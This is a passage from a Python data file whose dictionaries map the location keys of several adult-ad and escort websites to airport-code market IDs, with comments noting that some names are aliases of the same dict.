"Keys, Florida": "EYW",
"Killeen, Texas": "GRK",
"Kingston, Ontario": "YGK",
"Kirksville, Missouri": "IRK",
"Kitchener, Ontario": "YKF",
"Knoxville, Tennessee": "TYS",
"Kokomo, Indiana": "OKK",
"La Crosse, Wisconsin": "",
"LaSalle, Illinois": "VYS",
"Lafayette, Louisiana": "LFT",
"Lake Charles, Louisiana": "LCH",
"Lake Of The Ozarks, Missouri": "AIZ",
"Lakeland, Florida": "LAL",
"Lancaster, Pennsylvania": "LNS",
"Lansing, Michigan": "LAN",
"Laredo, Texas": "LRD",
"Las Vegas, Nevada": "LAS",
"Lawrence, Kansas": "LWC",
"Lawton, Oklahoma": "LAW",
"Lethbridge, Alberta": "YQL",
"Lewiston, Idaho": "LWS",
"Lexington, Kentucky": "LEX",
"Lima, Ohio": "LIM",
"Little Rock, Arkansas": "LIT",
"Logan, Utah": "LGU",
"London, Ontario": "YXU",
"Long Beach, California": "LGB",
"Los Angeles, California": "LAX",
"Louisville, Kentucky": "SDF",
"Lubbock, Texas": "LBB",
"Lynchburg, Virginia": "LYH",
"Macon, Georgia": "MCN",
"Madison, Wisconsin": "MSN",
"Manchester, New Hampshire": "MHT",
"Manhattan, Kansas": "MHK",
"Mankato, Minnesota": "MKT",
"Mansfield, Ohio": "MFD",
"Martinsburg, West Virginia": "MRB",
"Mason City, Iowa": "MCW",
"Mattoon, Illinois": "MTO",
"Maui, Hawaii": "OGG",
"Mcallen, Texas": "MFE",
"Meadville, Pennsylvania": "GKJ",
"Medford, Oregon": "MFR",
"Memphis, Tennessee": "MEM",
"Mendocino, California": "UKI",
"Merced, California": "MCE",
"Meridian, Mississippi": "MEI",
"Miami, Florida": "MIA",
"Milwaukee, Wisconsin": "MKE",
"Minneapolis, Minnesota": "MSP",
"Mobile, Alabama": "MOB",
"Modesto, California": "MOD",
"Mohave, Arizona": "IFP",
"Monroe, Michigan": "TTF",
"Monterey, California": "MRY",
"Montgomery, Alabama": "MGM",
"Montreal, Quebec": "YUL",
"Morgantown, West Virginia": "MGW",
"Moses Lake, Washington": "MWH",
"Muncie, Indiana": "MIE",
"Muskegon, Michigan": "MKG",
"Myrtle Beach, South Carolina": "MYR",
"Nanaimo, British Columbia": "YCD",
"Nashville, Tennessee": "BNA",
"Natchez, Mississippi": "HEZ",
"New Haven, Connecticut": "HVN",
"New Orleans, Louisiana": "MSY",
"New York, New York": "JFK",
"Newport News, Virginia": "ORF",
"Niagara, Ontario": "YCM",
"Norfolk, Virginia": "ORF",
"North Jersey, New Jersey": "EWR",
"North Platte, Nebraska": "LBF",
"Northern Michigan, Michigan": "TVC",
"Northern Mississippi, Mississippi": "TUP",
"Northern Virginia, Dc": "IAD",
"Northwest Connecticut, Connecticut": "DXR",
"Northwest Georgia, Georgia": "RMG",
"Ocala, Florida": "OCF",
"Odessa, Texas": "MAF",
"Ogden, Utah": "OGD",
"Oklahoma City, Oklahoma": "OKC",
"Olympia, Washington": "TCM",
"Omaha, Nebraska": "OMA",
"Oneonta, New York": "ONH",
"Orange County, California": "SNA",
"Oregon Coast, Oregon": "ONP",
"Orlando, Florida": "MCO",
"Ottawa, Ontario": "YOW",
"Ottumwa, Iowa": "OTM",
"Outer Banks, North Carolina": "FFA",
"Owen Sound, Ontario": "YOS",
"Owensboro, Kentucky": "OWB",
"Palmdale, California": "PMD",
"Palms Prings, California": "PSP",
"Panama City, Florida": "PFN",
"Parkersburg, West Virginia": "PKB",
"Pennstate, Pennsylvania": "UNV",
"Pensacola, Florida": "PNS",
"Peoria, Illinois": "PIA",
"Peterborough, Ontario": "YPQ",
"Philadelphia, Pennsylvania": "PHL",
"Phoenix, Arizona": "PHX",
"Pittsburgh, Pennsylvania": "PIT",
"Plattsburgh, New York": "PBG",
"Poconos, Pennsylvania": "MPO",
"Port Huron, Michigan": "PHN",
"Portland, Oregon": "PDX",
"Portsmouth, Maine": "PWM",
"Portsmouth, Virginia": "ORF",
"Potsdam, New York": "PTD",
"Prescott, Arizona": "PRC",
"Prince George, British Columbia": "YXS",
"Provo, Utah": "PVU",
"Pueblo, Colorado": "PUB",
"Puerto Rico, Puerto Rico": "SJU",
"Pullman, Washington": "PUW",
"Quad Cities, Iowa": "MLI",
"Quebec, Quebec": "YQB",
"Quincy, Illinois": "UIN",
"Racine, Wisconsin": "RAC",
"Raleigh, North Carolina": "RDU",
"Reading, Pennsylvania": "RDG",
"Red Deer, Alberta": "YQF",
"Redding, California": "RDD",
"Regina, Saskatchewan": "YQR",
"Reno, Nevada": "RNO",
"Richmond, Virginia": "RIC",
"Riverside, California": "ONT",
"Roanoke, Virginia": "ROA",
"Rochester, New York": "ROC",
"Rockford, Illinois": "RFD",
"Rockies, Colorado": "EGE",
"Roseburg, Oregon": "RBG",
"ST. Augustine, Florida": "UST",
"Sacramento, California": "SMF",
"Saginaw, Michigan": "MBS",
"Saguenay, Quebec": "YBG",
"Salem, North Carolina": "INT",
"Salem, Oregon": "SLE",
"Salt Lake City, Utah": "SLC",
"San Antonio, Texas": "SAT",
"San Bernardino, California": "ONT",
"San Diego, California": "SAN",
"San Fernando, California": "BUR",
"San Francisco, California": "SFO",
"San Jose, California": "SJC",
"San Luis Obispo, California": "SBP",
"San Marcos, Texas": "HYI",
"Sandusky, Ohio": "SKY",
"Santa Barbara, California": "SBA",
"Santa Cruz, California": "WVI",
"Santa Maria, California": "SMX",
"Santafe, New Mexico": "SAF",
"Sarasota, Florida": "SRQ",
"Sarnia, Ontario": "YZR",
"Saskatoon, Saskatchewan": "YXE",
"Sault, Ontario": "YAM",
"Savannah, Georgia": "SAV",
"Scotts Bluff, Nebraska": "BFF",
"Scranton, Pennsylvania": "AVP",
"Seattle, Washington": "SEA",
"Sheboygan, Wisconsin": "SBM",
"Sherbrooke, Quebec": "YSC",
"Shoals, Alabama": "MSL",
"Showlow, Arizona": "SOW",
"Shreveport, Louisiana": "SHV",
"Sierra Vista, Arizona": "FHU",
"Sioux City, Iowa": "SUX",
"Siskiyou, California": "SIY",
"Skeena, British Columbia": "XCM",
"South Bend, Indiana": "SBN",
"South Coast, Massachusetts": "EWB",
"South Jersey, New Jersey": "MIV",
"Southeast Missouri, Missouri": "CGI",
"Southern Maryland, Dc": "2W6",
"Southern West Virgin, West Virginia": "BKW",
"Southwest Michigan, Michigan": "BEH",
"Southwest Virginia, Virginia": "MKJ",
"Space Coast, Florida": "TIX",
"Spokane, Washington": "GEG",
"Springfield, Illinois": "SPI",
"Springfield, Massachusetts": "CEF",
"Springfield, Missouri": "SGF",
"St Cloud, Minnesota": "STC",
"St George, Utah": "SGU",
"St Joseph, Missouri": "STJ",
"St Louis, Missouri": "STL",
"Statesboro, Georgia": "TBR",
"Stillwater, Oklahoma": "SWO",
"Sudbury, Ontario": "YSB",
"Suffolk, Virginia": "ORF",
"Sunshine, British Columbia": "YHS",
"Susanville, California": "SVE",
"Syracuse, New York": "SYR",
"Tacoma, Washington": "TCM",
"Tallahassee, Florida": "TLH",
"Tampa, Florida": "TPA",
"Terre Haute, Indiana": "HUF",
"Texarkana, Texas": "TXK",
"Texoma, Texas": "GYI",
"Thunderbay, Ontario": "YQT",
"Toledo, Ohio": "TOL",
"Topeka, Kansas": "FOE",
"Toronto, Ontario": "YYZ",
"Treasure Coast, Florida": "VRB",
"Tri Cities, Washington": "PSC",
"Trois Rivieres, Quebec": "YRQ",
"Tucson, Arizona": "TUS",
"Tulsa, Oklahoma": "TUL",
"Tuscaloosa, Alabama": "TCL",
"Tuscarawas, Ohio": "PHD",
"Twin Falls, Idaho": "TWF",
"Twintiers, New York": "OLE",
"Tyler, Texas": "TYR",
"Upper Peninsula, Michigan": "MQT",
"Utica, New York": "UCA",
"Valdosta, Georgia": "VLD",
"Vancouver, British Columbia": "YVR",
"Ventura, California": "OXR",
"Victoria, British Columbia": "YYJ",
"Virginia Beach, Virginia": "ORF",
"Visalia, California": "VIS",
"Waco, Texas": "ACT",
"Washington DC, Dc": "IAD",
"Waterloo, Iowa": "ALO",
"Watertown, New York": "ART",
"Wausau, Wisconsin": "AUW",
"Wenatchee, Washington": "EAT",
"West Kentucky, Kentucky": "PAH",
"West Palm Beach, Florida": "PBI",
"West Slope, Colorado": "GJT",
"Western Maryland, Maryland": "CBE",
"Wheeling, West Virginia": "HLG",
"Whistler, British Columbia": "YWS",
"Wichita Falls, Texas": "SPS",
"Wichita, Kansas": "ICT",
"Williamsport, Pennsylvania": "IPT",
"Wilmington, North Carolina": "ILM",
"Windsor, Ontario": "YQG",
"Worcester, Massachusetts": "ORH",
"Yakima, Washington": "YKM",
"York, Pennsylvania": "THV",
"Youngstown, Ohio": "YNG",
"Yuma, Arizona": "YUM",
"Zanesville, Ohio": "ZZV"}
# escortphonelist_sitekey_to_marketid
# NOTE: alias, not a copy -- this name is bound to the very same dict
# object as escortsincollege_sitekey_to_marketid, so mutating either
# name mutates both.
escortphonelist_sitekey_to_marketid = escortsincollege_sitekey_to_marketid
# eroticmugshots_massagetroll_sitekey_to_marketid
eroticmugshots_massagetroll_sitekey_to_marketid = {
"abbotsford": "YXX",
"aberdeen": "ABZ",
"abilene": "ABI",
"adelaide": "ADL",
"akron": "CAK",
"albany": "ALB",
"albuquerque": "ABQ",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"anchorage": "ANC",
"annapolis": "ANP",
"annarbor": "ARB",
"appleton": "ATW",
"asheville": "AVL",
"ashland": "MFR",
"ashtabula": "HZY",
"athens": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"augusta": "AGS",
"austin": "AUS",
"bakersfield": "BFL",
"baltimore": "BWI",
"barrie": "QEB",
"batonrouge": "BTR",
"battlecreek": "AZO",
"beaumont": "BPT",
"belleville": "YTR",
"bellingham": "BLI",
"bend": "RDM",
"bigisland": "KOA",
"biloxi": "GPT",
"binghamton": "BGM",
"birmingham": "BHM",
"birminghamuk": "BHX",
"blacksburg": "BCB",
"bloomington": "BMG",
"boise": "BOI",
"boone": "NC06",
"boston": "BOS",
"boulder": "WBU",
"bowlinggreen": "BWG",
"brantford": "YFD",
"brighton": "ESH",
"brisbane": "BNE",
"bristol": "BRS",
"brownsville": "BRO",
"brunswick": "BQK",
"buffalo": "BUF",
"calgary": "YYC",
"cambridge": "CBG",
"canberra": "CBR",
"capecod": "PVC",
"carbondale": "MDH",
"cariboo": "YXS",
"catskills": "20N",
"cedarrapids": "CID",
"centralmichigan": "LAN",
"chambana": "CMI",
"chambersburg": "N68",
"charlestonsc": "CHS",
"charlestonwv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chesapeake": "ORF",
"chicago": "ORD",
"chico": "CIC",
"chillicothe": "RZT",
"cincinnati": "CVG",
"cleveland": "CLE",
"collegestation": "CLL",
"coloradosprings": "COS",
"columbia": "COU",
"columbiasc": "CAE",
"columbus": "CMH",
"comoxvalley": "YQQ",
"cornwall": "YCC",
"corpuschristi": "CRP",
"corvallis": "CVO",
"cranbrook": "YXC",
"cumberlandvalley": "N68",
"dallas": "DFW",
"danville": "DAN",
"dayton": "DAY",
"daytona": "DAY",
"decatur": "DEC",
"denton": "DFW",
"denver": "DEN",
"desmoines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dothan": "DHN",
"dubuque": "DBQ",
"duluth": "DLH",
"eastanglia": "NWI",
"eastbay": "OAK",
"easternconnecticut": "GON",
"easternnc": "PGV",
"easternshore": "SBY",
"eastidaho": "IDA",
"eastkentucky": "PBX",
"eastmidlands": "EMA",
"eastoregon": "PDT",
"eauclaire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"elmira": "ELM",
"elpaso": "ELP",
"erie": "ERI",
"eugene": "EUG",
"evansville": "EVV",
"everett": "PAE",
"fargo": "FAR",
"fayetteville": "FAY",
"fingerlakes": "D82",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLO",
"fortcollins": "FNL",
"fortdodge": "FOD",
"fortmcmurray": "YMM",
"fortmyers": "RSW",
"fortsmith": "FSM",
"fortwayne": "FWA",
"frederick": "FDK",
"fredericksburg": "EZF",
"fresno": "FAT",
"ftlauderdale": "FLL",
"gadsden": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"glasgow": "GLA",
"glensfalls": "GFL",
"grandisland": "GRI",
"grandrapids": "GRR",
"greenbay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"guelph": "CNC4",
"hamilton": "YHM",
"hampshire": "SOU",
"hampton": "ORF",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hickory": "HKY",
"hiltonhead": "HHH",
"honolulu": "HNL",
"houston": "IAH",
"hudsonvalley": "SWF",
"humboldt": "HJO",
"huntington": "HTS",
"huntsville": "HSV",
"huntsvilletx": "UTS",
"indianapolis": "IND",
"inlandempire": "ONT",
"iowacity": "IOW",
"ithaca": "ITH",
"jackson": "JAN",
"jacksonville": "JAX",
"janesville": "JVL",
"jerseyshore": "ACY",
"jonesboro": "JBR",
"joplin": "JLN",
"kalamazoo": "AZO",
"kamloops": "YKA",
"kansascity": "MCI",
"kauai": "LIH",
"kelowna": "YLW",
"keys": "EYW",
"killeen": "GRK",
"kingston": "YGK",
"kirksville": "IRK",
"kitchener": "YKF",
"knoxville": "TYS",
"kokomo": "OKK",
"lacrosse": "LSE",
"lafayette": "LFT",
"lakecharles": "LCH",
"lakeland": "LAL",
"lakeoftheozarks": "AIZ",
"lancaster": "LNS",
"lansing": "LAN",
"laredo": "LRD",
"lasalle": "VYS",
"lasvegas": "LAS",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lima": "AOH",
"littlerock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"londonon": "YXU",
"londonuk": "LHR",
"longbeach": "LGB",
"losangeles": "LAX",
"louisville": "SDF",
"lubbock": "LBB",
"lynchburg": "LYH",
"macon": "MCN",
"madison": "MSN",
"manchester": "MAN",
"manchesternh": "MHT",
"manhattan": "MHK",
"mankato": "MKT",
"mansfield": "MFD",
"martinsburg": "MRB",
"masoncity": "MCW",
"mattoon": "MTO",
"maui": "OGG",
"mcallen": "MFE",
"meadville": "GKJ",
"medford": "MFR",
"melbourne": "MEL",
"memphis": "MEM",
"mendocino": "UKI",
"merced": "MCE",
"meridian": "MEI",
"miami": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"mobile": "MOB",
"modesto": "MOD",
"mohave": "IFP",
"monroe": "TTF",
"monterey": "MRY",
"montgomery": "MGM",
"montreal": "YUL",
"morgantown": "MGW",
"moseslake": "MWH",
"muncie": "MIE",
"muskegon": "MKG",
"myrtlebeach": "MYR",
"nanaimo": "YCD",
"nashville": "BNA",
"natchez": "HEZ",
"newcastle": "NCL",
"newhaven": "HVN",
"neworleans": "MSY",
"newportnews": "ORF",
"newyork": "JFK",
"niagara": "YCM",
"norfolk": "ORF",
"northernmichigan": "TVC",
"northernmississippi": "TUP",
"northjersey": "EWR",
"northplatte": "LBF",
"northwestconnecticut": "DXR",
"northwestgeorgia": "RMG",
"nova": "IAD",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"oklahomacity": "OKC",
"olympia": "TCM",
"omaha": "OMA",
"oneonta": "ONH",
"orangecounty": "SNA",
"oregoncoast": "ONP",
"orlando": "MCO",
"ottawa": "YOW",
"ottumwa": "OTM",
"outerbanks": "FFA",
"owensboro": "OWB",
"owensound": "YOS",
"oxford": "OXF",
"palmdale": "PMD",
"palmsprings": "PSP",
"panamacity": "PFN",
"parkersburg": "PKB",
"pennstate": "UNV",
"pensacola": "PNS",
"peoria": "PIA",
"perth": "PER",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"porthuron": "PHN",
"portland": "PDX",
"portsmouth": "ORF",
"portsmouthme": "PWM",
"potsdam": "MSS",
"prescott": "PRC",
"princegeorge": "YXS",
"provo": "PVU",
"pueblo": "PUB",
"puertorico": "SJU",
"pullman": "PUW",
"quadcities": "MLI",
"quebec": "YQB",
"quincy": "UIN",
"racine": "RAC",
"raleigh": "RDU",
"reading": "RDG",
"reddeer": "YQF",
"redding": "RDD",
"reno": "RNO",
"richmond": "RIC",
"riverside": "ONT",
"roanoke": "ROA",
"rochester": "ROC",
"rockford": "RFD",
"rockies": "EGE",
"roseburg": "RBG",
"sacramento": "SMF",
"saginaw": "MBS",
"salem": "SLE",
"saltlakecity": "SLC",
"sanantonio": "SAT",
"sanbernardino": "ONT",
"sandiego": "SAN",
"sandusky": "SKY",
"sanfernandovalley": "BUR",
"sanfrancisco": "SFO",
"sanjose": "SJC",
"sanluisobispo": "SBP",
"sanmarcos": "HYI",
"santabarbara": "SBA",
"santacruz": "WVI",
"santafe": "SAF",
"santamaria": "SMX",
"sarasota": "SRQ",
"sarnia": "YZR",
"saskatoon": "YXE",
"sault": "YAM",
"savannah": "SAV",
"scottsbluff": "BFF",
"scranton": "AVP",
"seattle": "SEA",
"sheboygan": "SBM",
"sheffield": "DSA",
"shoals": "MSL",
"showlow": "SOW",
"shreveport": "SHV",
"sierravista": "FHU",
"siouxcity": "SUX",
"siskiyou": "SIY",
"skeena": "XCM",
"southbend": "SBN",
"southcoast": "EWB",
"southeastmissouri": "CGI",
"southernmaryland": "2W6",
"southernwestvirginia": "BKW",
"southjersey": "MIV",
"southwestmichigan": "BEH",
"spacecoast": "TIX",
"spokane": "GEG",
"springfield": "CEF",
"springfieldmo": "SGF",
"statesboro": "TBR",
"staugustine": "UST",
"stcloud": "STC",
"stgeorge": "SGU",
"stillwater": "SWO",
"stjoseph": "STJ",
"stlouis": "STL",
"sudbury": "YSB",
"suffolk": "ORF",
"sunshine": "YHS",
"susanville": "SVE",
"swva": "MKJ",
"sydney": "SYD",
"syracuse": "SYR",
"tacoma": "TCM",
"tallahassee": "TLH",
"tampa": "TPA",
"terrehaute": "HUF",
"texarkana": "TXK",
"texoma": "GYI",
"thunderbay": "YQT",
"tijuana": "TIJ",
"toledo": "TOL",
"topeka": "FOE",
"toronto": "YYZ",
"treasurecoast": "VRB",
"tricities": "TRI",
"troisrivieres": "YRQ",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"tuscarawas": "PHD",
"twinfalls": "TWF",
"twintiers": "OLE",
"tyler": "TYR",
"upperpeninsula": "MQT",
"utica": "UCA",
"valdosta": "VLD",
"vancouver": "YVR",
"ventura": "OXR",
"victoria": "YYJ",
"virginiabeach": "ORF",
"visalia": "VIS",
"waco": "ACT",
"wales": "CWL",
"washingtondc": "IAD",
"waterloo": "YKF",
"watertown": "ART",
"wausau": "AUW",
"wenatchee": "EAT",
"westernmaryland": "CBE",
"westkentucky": "PAH",
"westpalmbeach": "PBI",
"westslope": "GJT",
"wheeling": "HLG",
"whistler": "YWS",
"wichita": "ICT",
"wichitafalls": "SPS",
"williamsport": "IPT",
"wilmington": "ILM",
"windsor": "YQG",
"winston": "INT",
"worcester": "ORH",
"yakima": "YKM",
"york": "THV",
"youngstown": "YNG",
"yuma": "YUM",
"zanesville": "ZZV",
# Massagetroll only
"canton": "CAK",
"centraljersey": "47N",
"findlay": "AOH",
"springfieldil": "SPI",
"stpaul": "MSP"
}
# Aliases, not copies: all three names below refer to the single shared
# eroticmugshots_massagetroll dict object, so a mutation through any one
# of them is visible through the others.
eroticmugshots_sitekey_to_marketid = eroticmugshots_massagetroll_sitekey_to_marketid
massagetroll_sitekey_to_marketid = eroticmugshots_massagetroll_sitekey_to_marketid
# escortadsxxx_sitekey_to_marketid
escortadsxxx_sitekey_to_marketid = {
("Abbotsford", "British Columbia"): "YXX",
("Aberdeen", "Uk"): "ABZ",
("Abilene", "Texas"): "ABI",
("Adelaide", "Australia"): "ADL",
("Akron", "Ohio"): "CAK",
("Albany", "New York"): "ALB",
("Albuquerque", "New Mexico"): "ABQ",
("Allentown", "Pennsylvania"): "ABE",
("Altoona", "Pennsylvania"): "AOO",
("Amarillo", "Texas"): "AMA",
("Anchorage", "Alaska"): "ANC",
("Ann Arbor", "Michigan"): "ARB",
("Annapolis", "Maryland"): "ANP",
("Appleton", "Wisconsin"): "ATW",
("Asheville", "North Carolina"): "AVL",
("Ashland", "Ohio"): "HTS",
("Ashtabula", "Ohio"): "HZY",
("Athens", "Ohio"): "ATO",
("Atlanta", "Georgia"): "ATL",
("Auburn", "Alabama"): "AUO",
("Augusta", "Georgia"): "AGS",
("Austin", "Texas"): "AUS",
("Bakersfield", "California"): "BFL",
("Baltimore", "Maryland"): "BWI",
("Barrie", "Ontario"): "QEB",
("Baton Rouge", "Louisiana"): "BTR",
("Battle Creek", "Michigan"): "AZO",
("Beaumont", "Texas"): "BPT",
("Belleville", "Ontario"): "YTR",
("Bellingham", "Washington"): "BLI",
("Bend", "Oregon"): "RDM",
("Bigisland", "Hawaii"): "KOA",
("Biloxi", "Mississippi"): "GPT",
("Binghamton", "New York"): "BGM",
("Birmingham", "Alabama"): "BHM",
("Birmingham", "Uk"): "BHX",
("Blacksburg", "Virginia"): "BCB",
("Bloomington", "Indiana"): "BMG",
("Boise", "Idaho"): "BOI",
("Boone", "North Carolina"): "NC06",
("Boston", "Massachusetts"): "BOS",
("Boulder", "Colorado"): "WBU",
("Bowling Green", "Kentucky"): "BWG",
("Brantford", "Ontario"): "YFD",
("Brighton", "Uk"): "ESH",
("Brisbane", "Australia"): "BNE",
("Bristol", "Uk"): "BRS",
("Brownsville", "Texas"): "BRO",
("Brunswick", "Georgia"): "BQK",
("Buffalo", "New York"): "BUF",
("Calgary", "Alberta"): "YYC",
("Cambridge", "Uk"): "CBG",
("Canberra", "Australia"): "CBR",
("Cape Cod", "Massachusetts"): "PVC",
("Carbondale", "Illinois"): "MDH",
("Cariboo", "British Columbia"): "YXS",
("Catskills", "New York"): "20N",
("Cedar Rapids", "Iowa"): "CID",
("Central Michigan", "Michigan"): "LAN",
("Chambana", "Illinois"): "CMI",
("Chambersburg", "Pennsylvania"): "N68",
("Charleston", "South Carolina"): "CHS",
("Charleston", "West Virginia"): "CRW",
("Charlottesville", "Virginia"): "CHO",
("Charlotte", "North Carolina"): "CLT",
("Chatham", "Ontario"): "XCM",
("Chattanooga", "Tennessee"): "CHA",
("Chautauqua", "New York"): "JHW",
("Chesapeake", "Virginia"): "ORF",
("Chicago", "Illinois"): "ORD",
("Chico", "California"): "CIC",
("Chillicothe", "Ohio"): "RZT",
("Cincinnati", "Ohio"): "CVG",
("Cleveland", "Ohio"): "CLE",
("College Station", "Texas"): "CLL",
("Colorado Springs", "Colorado"): "COS",
("Columbia", "Missouri"): "COU",
("Columbia", "South Carolina"): "CAE",
("Columbus", "Ohio"): "CMH",
("Comox Valley", "British Columbia"): "YQQ",
("Cornwall", "Ontario"): "YCC",
("Corpus Christi", "Texas"): "CRP",
("Corvallis", "Oregon"): "CVO",
("Cranbrook", "British Columbia"): "YXC",
("Cumberland Valley", "Maryland"): "CBE",
("Dallas", "Texas"): "DFW",
("Danville", "Virginia"): "DAN",
("Daytona", "Florida"): "DAB",
("Dayton", "Ohio"): "DAY",
("Decatur", "Illinois"): "DEC",
("Denton", "Texas"): "DFW",
("Denver", "Colorado"): "DEN",
("Des Moines", "Iowa"): "DSM",
("Detroit", "Michigan"): "DTW",
("Devon", "Uk"): "EXT",
("Dothan", "Alabama"): "DHN",
("Dubuque", "Iowa"): "DBQ",
("Duluth", "Minnesota"): "DLH",
("East Anglia", "Uk"): "NWI",
("East Bay", "California"): "OAK",
("East Idaho", "Idaho"): "IDA",
("East Kentucky", "Kentucky"): "PBX",
("East Midlands", "Uk"): "EMA",
("East Oregon", "Oregon"): "PDT",
("Eastern Connecticut", "Connecticut"): "GON",
("Eastern NC", "North Carolina"): "PGV",
("Eastern Shore", "Maryland"): "SBY",
("Eauclaire", "Wisconsin"): "EAU",
("Edinburgh", "Uk"): "EDI",
("Edmonton", "Alberta"): "YEG",
("El Paso", "Texas"): "ELP",
("Elmira", "New York"): "ELM",
("Erie", "Pennsylvania"): "ERI",
("Eugene", "Oregon"): "EUG",
("Evansville", "Indiana"): "EVV",
("Everett", "Washington"): "PAE",
("Fargo", "North Dakota"): "FAR",
("Fayetteville", "North Carolina"): "FAY",
("Finger Lakes", "New York"): "D82",
("Flagstaff", "Arizona"): "FLG",
("Flint", "Michigan"): "FNT",
("Florence", "South Carolina"): "FLO",
("Fort Collins", "Colorado"): "FNL",
("Fort Dodge", "Iowa"): "FOD",
("Fort Mcmurray", "Alberta"): "YMM",
("Fort Myers", "Florida"): "RSW",
("Fort Smith", "Arkansas"): "FSM",
("Fort Wayne", "Indiana"): "FWA",
("Fredericksburg", "Virginia"): "EZF",
("Frederick", "Maryland"): "FDK",
("Fresno", "California"): "FAT",
("Ft Lauderdale", "Florida"): "FLL",
("Gadsden", "Alabama"): "GAD",
("Gainesville", "Florida"): "GNV",
("Galveston", "Texas"): "GLS",
("Glasgow", "Uk"): "GLA",
("Glens Falls", "New York"): "GFL",
("Grand Island", "Nebraska"): "GRI",
("Grand Rapids", "Michigan"): "GRR",
("Green Bay", "Wisconsin"): "GRB",
("Greensboro", "North Carolina"): "GSO",
("Greenville", "South Carolina"): "GSP",
("Guelph", "Ontario"): "CNC4",
("Hamilton", "Ontario"): "YHM",
("Hampshire", "Uk"): "SOU",
("Hampton", "Virginia"): "ORF",
("Harrisburg", "Pennsylvania"): "MDT",
("Harrisonburg", "Virginia"): "SHD",
("Hartford", "Connecticut"): "HFD",
("Hattiesburg", "Mississippi"): "HBG",
("Hickory", "North Carolina"): "HKY",
("Hilton Head", "South Carolina"): "HHH",
("Honolulu", "Hawaii"): "HNL",
("Houston", "Texas"): "IAH",
("Hudson Valley", "New York"): "SWF",
("Humboldt County", "California"): "ACV",
("Huntington", "West Virginia"): "HTS",
("Huntsville", "Alabama"): "HSV",
("Huntsville", "Texas"): "UTS",
("Indianapolis", "Indiana"): "IND",
("Inland Empire", "California"): "ONT",
("Iowa City", "Iowa"): "IOW",
("Ithaca", "New York"): "ITH",
("Jacksonville", "Florida"): "JAX",
("Jackson", "Mississippi"): "JAN",
("Janesville", "Wisconsin"): "JVL",
("Jersey Shore", "New Jersey"): "ACY",
("Jonesboro", "Arkansas"): "JBR",
("Joplin", "Missouri"): "JLN",
("Kalamazoo", "Michigan"): "AZO",
("Kamloops", "British Columbia"): "YKA",
("Kansas City", "Missouri"): "MCI",
("Kauai", "Hawaii"): "LIH",
("Kelowna", "British Columbia"): "YLW",
("Keys", "Florida"): "EYW",
("Killeen", "Texas"): "GRK",
("Kingston", "Ontario"): "YGK",
("Kirksville", "Missouri"): "IRK",
("Kitchener", "Ontario"): "YKF",
("Knoxville", "Tennessee"): "TYS",
("Kokomo", "Indiana"): "OKK",
("La Crosse", "Wisconsin"): "LSE",
("LaSalle", "Illinois"): "VYS",
("Lafayette", "Louisiana"): "LFT",
("Lake Charles", "Louisiana"): "LCH",
("Lake Of The Ozarks", "Missouri"): "AIZ",
("Lakeland", "Florida"): "LAL",
("Lancaster", "Pennsylvania"): "LNS",
("Lansing", "Michigan"): "LAN",
("Laredo", "Texas"): "LRD",
("Las Vegas", "Nevada"): "LAS",
("Lawrence", "Kansas"): "LWC",
("Lawton", "Oklahoma"): "LAW",
("Leeds", "Uk"): "LBA",
("Lethbridge", "Alberta"): "YQL",
("Lewiston", "Idaho"): "LWS",
("Lexington", "Kentucky"): "LEX",
("Lima", "Ohio"): "AOH",
("Little Rock", "Arkansas"): "LIT",
("Liverpool", "Uk"): "LPL",
("Logan", "Utah"): "LGU",
("London", "Ontario"): "YXU",
("London", "Uk"): "LHR",
("Long Beach", "California"): "LGB",
("Los Angeles", "California"): "LAX",
("Louisville", "Kentucky"): "SDF",
("Lubbock", "Texas"): "LBB",
("Lynchburg", "Virginia"): "LYH",
("Macon", "Georgia"): "MCN",
("Madison", "Wisconsin"): "MSN",
("Manchester", "New Hampshire"): "MHT",
("Manchester", "Uk"): "MAN",
("Manhattan", "Kansas"): "MHK",
("Mankato", "Minnesota"): "MKT",
("Mansfield", "Ohio"): "MFD",
("Martinsburg", "West Virginia"): "MRB",
("Mason City", "Iowa"): "MCW",
("Mattoon", "Illinois"): "MTO",
("Maui", "Hawaii"): "OGG",
("Mcallen", "Texas"): "MFE",
("Meadville", "Pennsylvania"): "GKJ",
("Medford", "Oregon"): "MFR",
("Melbourne", "Australia"): "MEL",
("Memphis", "Tennessee"): "MEM",
("Mendocino", "California"): "UKI",
("Merced", "California"): "MCE",
("Meridian", "Mississippi"): "MEI",
("Miami", "Florida"): "MIA",
("Milwaukee", "Wisconsin"): "MKE",
("Mobile", "Alabama"): "MOB",
("Modesto", "California"): "MOD",
("Mohave", "Arizona"): "IFP",
("Monroe", "Michigan"): "TTF",
("Monterey", "California"): "MRY",
("Montgomery", "Alabama"): "MGM",
("Montreal", "Quebec"): "YUL",
("Morgantown", "West Virginia"): "MGW",
("Moses Lake", "Washington"): "MWH",
("Muncie", "Indiana"): "MIE",
("Muskegon", "Michigan"): "MKG",
("Myrtle Beach", "South Carolina"): "MYR",
("Nanaimo", "British Columbia"): "YCD",
("Nashville", "Tennessee"): "BNA",
("Natchez", "Mississippi"): "HEZ",
("New Haven", "Connecticut"): "HVN",
("New Orleans", "Louisiana"): "MSY",
("New York", "New York"): "JFK",
("Newcastle", "Uk"): "NCL",
("Newport News", "Virginia"): "ORF",
("Niagara", "Ontario"): "YCM",
("Norfolk", "Virginia"): "ORF",
("North Jersey", "New Jersey"): "EWR",
("North Platte", "Nebraska"): "LBF",
